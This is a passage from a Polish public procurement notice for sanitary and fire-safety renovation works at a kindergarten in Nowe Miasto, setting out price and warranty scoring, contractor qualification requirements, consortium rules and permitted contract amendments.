72 miesiące.<br/>Okres gwarancji liczony jest od dnia podpisania przez strony protokołu odbioru końcowego robót budowlanych. Przy ocenie ofert<br/>będzie brany pod uwagę okres udzielonej gwarancji (w pełnych miesiącach), ponad minimum wymagane w zamówieniu tj. ponad 60<br/>miesięcy.<br/>Oznacza to, że Wykonawca otrzyma punkty za w/w kryterium oceny ofert jeśli zaproponuje okres gwarancji wyższy niż 60 miesięcy<br/>tj. 66 m-cy lub 72 m-cy. W przypadku zaoferowania minimalnego, wymaganego okresu gwarancji (60 miesięcy) Wykonawca otrzyma<br/>0 pkt w ww. kryterium oceny ofert. Wykonawca może zaoferować również okres gwarancji 66 m-cy, wówczas otrzyma 20 pkt.<br/>Ogłoszenie nr 2022/BZP 00072341/01 z dnia 2022-03-02<br/>2022-03-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Maksymalny okres gwarancji podlegający punktacji to 72 miesiące. Oznacza to, że Wykonawca, który zaproponuje 72 miesiące<br/>gwarancji otrzyma maksymalną liczbę punktów w tym kryterium tj 40 pkt.<br/>Jeżeli Wykonawca nie zadeklaruje w formularzu oferty okresu gwarancji w miesiącach, wówczas Zamawiający przyjmie minimalny<br/>okres gwarancji wynoszący 60 miesięcy, a Wykonawca otrzyma 0 pkt w kryterium „ okres gwarancji”. Zamawiający określa<br/>minimalny oferowany okres gwarancji - 60 miesięcy Oferta z zaoferowanym okresem krótszym niż minimalny, zostanie odrzucona na<br/>podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako oferta, której treść jest niezgodna z warunkami zamówienia.<br/>Zamawiający określa limit maksymalnego oferowanego okresu gwarancji - 72 miesiące.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż limitowany, do oceny oferty Zamawiający przyjmie okres skrócony do<br/>określonego maksimum limitu.<br/>Oferta z maksymalnym okresem gwarancji tj. 72 miesiące otrzyma w tym kryterium maksymalnie 40 pkt.<br/>Za najkorzystniejszą Zamawiający uznana ofertę, która uzyska największą liczbę punktów w wyniku zsumowania punktów w<br/>kryterium „cena” i „okres gwarancji” według poniższego<br/>wzoru:<br/>Łączna liczba punktów ocenianej oferty = C+G<br/>Ilość punktów w kryterium ,,cena”, ,,okres gwarancji” oraz łączna liczba punktów będą obliczane<br/>z dokładnością do dwóch miejsc po przecinku z zastosowaniem matematycznej zasady zaokrąglania do drugiego miejsca po<br/>przecinku. W powyższych kryteriach oferta może uzyskać maksymalnie 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III- „Modernizacja budynku Przedszkola Samorządowego im. Misia Uszatka w Nowym Mieście - wykonanie robót budowlanych poprawiających warunki bezpieczeństwa pożarowego w budynku – ROBOTY SANITARNE” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45262690-4 - Remont starych budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45232100-3 - Roboty pomocnicze w zakresie wodociągów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty, spośród ofert Wykonawców, którzy spełniają<br/>warunki udziału w postępowaniu oraz warunki określone w SWZ zastosuje następujące kryteria:<br/>Cena (C) -znaczenie kryterium 60%<br/>Ocena ofert w ww. kryterium będzie dokonywana wg poniższego wzoru:<br/>cena najniższa<br/>------------------- x 60 = ilość punktów w kryterium cena<br/>cena badana<br/>Oferta z najniższą ceną otrzyma w tym kryterium maksymalnie 60 pkt.<br/>Okres gwarancji (G) -znaczenie kryterium 40%<br/>Kryterium „okres gwarancji” będzie oceniane na podstawie okresu udzielonej przez Wykonawcę gwarancji na przedmiot zamówienia<br/>( roboty budowlane, materiały, wyposażenie) zadeklarowanej w pkt.7 Formularza oferty cenowej –Załącznik nr 2 do SWZ.<br/>Minimalny okres udzielonej gwarancji na wykonany przedmiot zamówienia wymagany przez Zamawiającego to okres 60 miesięcy,<br/>zaś okres maksymalny to 72 miesiące.<br/>Okres gwarancji liczony jest od dnia podpisania przez strony protokołu odbioru końcowego robót budowlanych. Przy ocenie ofert<br/>będzie brany pod uwagę okres udzielonej gwarancji (w pełnych miesiącach), ponad minimum wymagane w zamówieniu tj. ponad 60<br/>miesięcy.<br/>Oznacza to, że Wykonawca otrzyma punkty za w/w kryterium oceny ofert jeśli zaproponuje okres gwarancji wyższy niż 60 miesięcy<br/>tj. 66 m-cy lub 72 m-cy. W przypadku zaoferowania minimalnego, wymaganego okresu gwarancji (60 miesięcy) Wykonawca otrzyma<br/>0 pkt w ww. kryterium oceny ofert. Wykonawca może zaoferować również okres gwarancji 66 m-cy, wówczas otrzyma 20 pkt.<br/>Ogłoszenie nr 2022/BZP 00072341/01 z dnia 2022-03-02<br/>2022-03-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Maksymalny okres gwarancji podlegający punktacji to 72 miesiące. Oznacza to, że Wykonawca, który zaproponuje 72 miesiące<br/>gwarancji otrzyma maksymalną liczbę punktów w tym kryterium tj 40 pkt.<br/>Jeżeli Wykonawca nie zadeklaruje w formularzu oferty okresu gwarancji w miesiącach, wówczas Zamawiający przyjmie minimalny<br/>okres gwarancji wynoszący 60 miesięcy, a Wykonawca otrzyma 0 pkt w kryterium „ okres gwarancji”. Zamawiający określa<br/>minimalny oferowany okres gwarancji - 60 miesięcy Oferta z zaoferowanym okresem krótszym niż minimalny, zostanie odrzucona na<br/>podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, jako oferta, której treść jest niezgodna z warunkami zamówienia.<br/>Zamawiający określa limit maksymalnego oferowanego okresu gwarancji - 72 miesiące.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż limitowany, do oceny oferty Zamawiający przyjmie okres skrócony do<br/>określonego maksimum limitu.<br/>Oferta z maksymalnym okresem gwarancji tj. 72 miesiące otrzyma w tym kryterium maksymalnie 40 pkt.<br/>Za najkorzystniejszą Zamawiający uznana ofertę, która uzyska największą liczbę punktów w wyniku zsumowania punktów w<br/>kryterium „cena” i „okres gwarancji” według poniższego<br/>wzoru:<br/>Łączna liczba punktów ocenianej oferty = C+G<br/>Ilość punktów w kryterium ,,cena”, ,,okres gwarancji” oraz łączna liczba punktów będą obliczane<br/>z dokładnością do dwóch miejsc po przecinku z zastosowaniem matematycznej zasady zaokrąglania do drugiego miejsca po<br/>przecinku. W powyższych kryteriach oferta może uzyskać maksymalnie 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:nie podlegają wykluczeniu;spełniają warunki udziału w<br/>postępowaniu określone przez zamawiającego w ogłoszeniu o zamówieniu i niniejszej SWZ.<br/>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki udziału w postępowaniu<br/>dotyczące:zdolności technicznej– Zamawiający nie stawia warunku w powyższym zakresie zdolności zawodowej - o<br/>udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:dysponują osobami zdolnymi do wykonywania<br/>zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj. Posiadającymi prawo do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie zgodnie z poniższym wyszczególnieniem:<br/>- Jedną osobą do pełnienia funkcji kierownika budowy-posiadającą uprawnienia budowlane do kierowania budową lub<br/>robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej-lub odpowiadające im równoważne<br/>uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa.<br/>- Jedną osobą do pełnienia funkcji kierownika robót-posiadającą uprawnienia budowlane do kierowania budową lub<br/>robotami budowlanymi bez ograniczeń w specjalności instalacyjnej<br/>w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych<br/>i kanalizacyjnych bez ograniczeń lub odpowiadające im równoważne uprawnienia, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów prawa.<br/>- Jedną osobą do pełnienia funkcji kierownika robót-posiadającą uprawnienia budowlane do kierowania budową lub<br/>robotami budowlanymi bez ograniczeń w specjalności instalacyjnej<br/>w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - lub odpowiadające im równoważne<br/>uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa.Przez ww. uprawnienia<br/>Zamawiający rozumie uprawnienia określone w ustawie z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2020 r., poz.<br/>1333 z późń.zm.), Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania<br/>Ogłoszenie nr 2022/BZP 00072341/01 z dnia 2022-03-02<br/>2022-03-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) oraz<br/>uprawnienia obowiązujące wydane na podstawie wcześniej obowiązujących przepisów prawnych, a także zgodnie z art. 12a<br/>ustawy z dnia 7 lipca 1994 r. Prawo budowlane. Zamawiający uznaje również wymagane uprawnienia budowlane nabyte w<br/>innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, państwach członkowskich Europejskiego<br/>Porozumienia<br/>o Wolnym Handlu (EFTA)-stronach umowy o Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, na<br/>zasadach określonych w ustawie z dnia 22 grudnia 2015 roku o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej ( Dz.U. z 2020 r. poz. 2020 ze zm). Zamawiający dopuszcza wskazanie jednej<br/>osoby posiadającej uprawnienia w dwóch lub trzech specjalnościach.Osoby wskazane przez Wykonawcę w wykazie osób<br/>muszą brać udział w realizacji zamówienia. Zmiana tych osób jest możliwa tylko w okolicznościach i na warunkach<br/>określonych we wzorze umowy.Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez<br/>Wykonawcę spełniania warunków udziału w postępowaniu, a także bada, czy nie zachodzą wobec tego podmiotu podstawy<br/>wykluczenia, które zostały przewidziane względem Wykonawcy (Wykonawca zobowiązany będzie złożyć na wezwanie<br/>Zamawiającego zgodnie z art. 274 ust. 1 ustawy Pzp wraz z ofertą składaną w odpowiedzi na ogłoszenie o zamówieniu,<br/>podmiotowe środki dowodowe dotyczące tych podmiotów, w zakresie braku podstaw wykluczenia z postępowania w takim<br/>samym zakresie, w jakim zobowiązany jest złożyć te dokumenty sam Wykonawca). Podmiot, który zobowiązał się do<br/>udostępnienia zasobów,odpowiada solidarnie z Wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za<br/>szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie<br/>zasobów podmiot ten nie ponosi winy. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa<br/>podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub<br/>zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez<br/>Zamawiającego zastąpił ten podmiot innym<br/>podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.Wykonawca nie może,<br/>po upływie terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert, powoływać się na zdolności<br/>lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania wniosków o dopuszczenie do udziału w<br/>postępowaniu albo ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty, nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź<br/>wszyscy wspólnicy podpiszą ofertę. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika). W przypadku<br/>wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ust. 1<br/>ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają<br/>spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w<br/>oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż: Oświadczenie w zakresie braku podstaw do<br/>wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia – załącznik nr 4 do<br/>SWZ; Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w<br/>postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie<br/>podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów – załącznik nr<br/>3 do SWZ. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni wykonawcy Załącznik nr 8. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia<br/>z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.Wszelka korespondencja<br/>prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.Przed podpisaniem umowy (w przypadku wyboru danej oferty jako najkorzystniejszej) Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedłożyć Zamawiającemu umowę konsorcjum,<br/>zawierającą w szczególności: zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim<br/>zakresem realizację przedmiotu zamówienia, określenie zakresu działania poszczególnych stron umowy, czas<br/>obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji<br/>i rękojmi. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.Zamawiający nie wprowadza<br/>zastrzeżenia wskazującego na obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia.<br/>Zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawca wskazał w ofercie<br/>części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał nazwy ewentualnych<br/>podwykonawców, jeżeli są już znani (w „Formularzu oferty”). Zamawiający nie zastrzega obowiązku osobistego wykonania<br/>przez Wykonawcę kluczowych zadań.Jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby<br/>Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu wykazania spełniania warunków<br/>udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny Podwykonawca lub<br/>Wykonawca samodzielnie spełnia je<br/>w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o<br/>udzielenie zamówienia. Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy od<br/>Ogłoszenie nr 2022/BZP 00072341/01 z dnia 2022-03-02<br/>2022-03-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>odpowiedzialności za należyte wykonanie tego zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, podmiotowych środków dowodowych potwierdzających:<br/>a) spełnianie warunków udziału w postępowaniu<br/>- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami - załącznik nr 5.Do wykazu można dołączyć dokumenty potwierdzające<br/>posiadanie wymaganych uprawnień tj. decyzję o nadaniu wymaganych uprawnień oraz aktualne zaświadczenie o wpisie do<br/>właściwej izby zawodowej.<br/>Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych potwierdzających:<br/>spełnianie warunków udziału w postępowaniu<br/>- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 5.<br/>Do wykazu można dołączyć dokumenty potwierdzające posiadanie wymaganych uprawnień tj. decyzję o nadaniu wymaganych<br/>uprawnień oraz aktualne zaświadczenie o wpisie do właściwej izby zawodowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">brak podstaw do<br/>wykluczenia:<br/>- odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji;<br/>- oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów (dz. U. Z 2021 r. Poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – załącznik nr 9.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty, nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź<br/>wszyscy wspólnicy podpiszą ofertę.<br/>Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają<br/>spełnianie warunków udziału<br/>w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie<br/>warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy<br/>wykluczenia. Powyższe oznacza, iż:<br/>Oświadczenie w zakresie braku podstaw do wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia – załącznik nr 4 do SWZ;<br/>Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w<br/>postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie<br/>podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów – załącznik nr<br/>3 do SWZ.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>Ogłoszenie nr 2022/BZP 00072341/01 z dnia 2022-03-02<br/>2022-03-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy Załącznik nr 8.<br/>Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>Przed podpisaniem umowy (w przypadku wyboru danej oferty jako najkorzystniejszej) Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia będą mieli obowiązek przedłożyć Zamawiającemu umowę konsorcjum, zawierającą w szczególności:<br/>zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację<br/>przedmiotu zamówienia,<br/>określenie zakresu działania poszczególnych stron umowy,<br/>czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizację zamówienia oraz czas trwania<br/>gwarancji i rękojmi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość dokonania zmian w Umowie, pod warunkiem spełnienia przesłanek ustawowych<br/>określonych w przepisie art. 455 ustawy Pzp oraz w ust.4.Wszelkie zmiany Umowy wymagają zgody Zamawiającego i<br/>zachowania formy pisemnej pod rygorem nieważności. Wskazane w katalogu zmiany w ust.4 nie stanowią jednocześnie<br/>zobowiązania do wyrażenia takiej zgody.Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy<br/>w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w szczególności przewiduje następujące<br/>możliwości dokonania zmiany Umowy<br/>w następującym zakresie oraz na następujących warunkach:<br/>1) zmiany dotyczące terminu realizacji zamówienia:<br/>2) zmiany dotyczące wynagrodzenia:<br/>3) dotyczące sposobu realizacji przedmiotu umowy m.in. w przypadku konieczności zmiany sposobu przeprowadzenia robót<br/>lub wprowadzenia robót zamiennych w stosunku do przedmiotu umowy lub przy zastosowaniu innych rozwiązań<br/>technicznych / technologicznych / materiałowych od tych wskazanych w dokumentacji projektowej, wprowadzanych w<br/>sytuacji:<br/>4) pozostałe zmiany<br/>5) zmiana w zakresie podwykonawstwa<br/>Szczegółowy opis zmian umowy oraz warunków ich wprowadzenia zawarty jest w projekcie umowy stanowiącym załącznik<br/>Nr 6 do SWZ.<br/>Zamawiający dopuszcza zmiany umowy w przypadku stwierdzenia, że okoliczności związane z wystąpieniem COVID-19,<br/>wpływają na należyte wykonanie tej umowy.Zamawiający dopuszcza zmianę terminu wykonania zamówienia w przypadku<br/>ogłoszenia stanu zagrożenia epidemicznego albo stanu epidemii w związku z COVID-19. W niniejszym przypadku<br/>Wykonawca zobowiązany jest niezwłocznie poinformować Zamawiającego o wystąpieniu okoliczności związanych z COVID<br/>i ich wpływem na realizację przedmiotu umowy.Zamawiający dopuszcza możliwość zmiany kierownika budowy/ czasowego<br/>zastępstwa – pod warunkiem sporządzenia przez Wykonawcę pisemnego uzasadnienia wprowadzanej zmiany.<br/>Zamawiający po dokonaniu analizy 